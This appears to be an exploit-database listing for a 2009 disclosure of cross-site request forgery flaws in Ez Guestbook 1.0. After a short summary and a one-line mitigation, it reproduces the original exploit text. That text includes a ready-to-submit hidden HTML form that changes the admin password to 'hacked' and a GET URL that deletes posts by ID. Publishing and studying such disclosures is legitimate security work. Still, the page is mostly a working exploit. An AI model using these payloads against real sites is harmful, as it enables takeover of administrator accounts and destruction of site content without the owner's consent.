header-logo
Suggest Exploit
vendor:
Ez Guestbook
by:
Milos Zivanovic
8.8
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: Ez Guestbook
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:scriptsez:ez_guestbook:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ez Guestbook 1.0 Multiple Vulnerabilities

Ez Guestbook script version 1.0 suffers from multiple vulnerabilities, including a Cross Site Request Forgery vulnerability. An attacker can exploit this vulnerability by crafting a malicious form that changes the admin password and submitting it to the vulnerable application. Additionally, an attacker can exploit the vulnerability by sending a malicious request to the vulnerable application to delete a post by ID.

Mitigation:

Implement input validation and authentication checks to prevent malicious requests from being processed by the application.
Source

Exploit-DB raw data:

[-------------------------------------------------------------------------------------------------]
[   Title: Ez Guestbook 1.0 Multiple Vulnerabilities
                           ]
[   Author: Milos Zivanovic
                           ]
[   Email: milosz.security[at]gmail.com
                           ]
[   Date: 14. December 2009.
                           ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: Ez Guestbook
                           ]
[   Version: 1.0
                           ]
[   Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083
                 ]
[   Price: 10 USD
                           ]
[   Vulnerability: Cross Site Request Forgery
                           ]
[-------------------------------------------------------------------------------------------------]

Ez Guestbook script version 1.0 suffers from multiple vulnerabilities:

[#]Content
 |--Change admin password
 |--Remove post by ID

[*]Change admin password

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ez_gb/admin.php?action=change_password"
method="post">
  <input type="hidden" name="admin_password" value="hacked">
  <input type="hidden" name="c_admin_password" value="hacked">
  <input type="hidden" name="add" value="true">
  <input type="submit" name="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Remove post by ID

[POC----------------------------------------------------------------------------------------------]
http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]

[----------------------------------------------EOF------------------------------------------------]